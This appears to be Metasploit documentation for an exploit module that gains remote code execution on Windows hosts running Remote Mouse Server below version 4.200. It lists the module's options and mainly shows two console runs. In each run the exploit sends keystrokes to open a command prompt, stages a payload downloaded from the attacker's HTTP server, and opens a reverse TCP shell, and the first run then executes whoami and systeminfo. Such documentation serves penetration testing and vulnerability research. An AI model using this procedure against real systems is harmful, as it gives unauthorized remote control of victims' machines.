documentation/modules/exploit/windows/misc/remote_mouse_rce.md
This module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server on versions < 4.200 (500 server response). This module will deploy a payload regardless if server authentication is required. Tested against 4.110, current at the time of module writing
Version 4.110 can be downloaded from (unofficial site)[https://remote-mouse.en.uptodown.com/windows/download/4546712]
use exploit/windows/misc/remote_mouse_rcerhost and lhost as required.runThe length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
Defaults to 1.
The path where the payload should be downloaded/staged to. Defaults to c:\\Windows\\Temp\\.
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf exploit(windows/misc/remote_mouse_rce) > run
[*] Started reverse TCP handler on 192.168.2.199:4444
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
C:\Users\windows>whoami
whoami
win10prolicense\windows
C:\Users\windows>systeminfo
systeminfo
Host Name: WIN10PROLICENSE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.16299 N/A Build 16299
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf exploit(windows/misc/remote_mouse_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.199:4444
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
C:\Users\windows>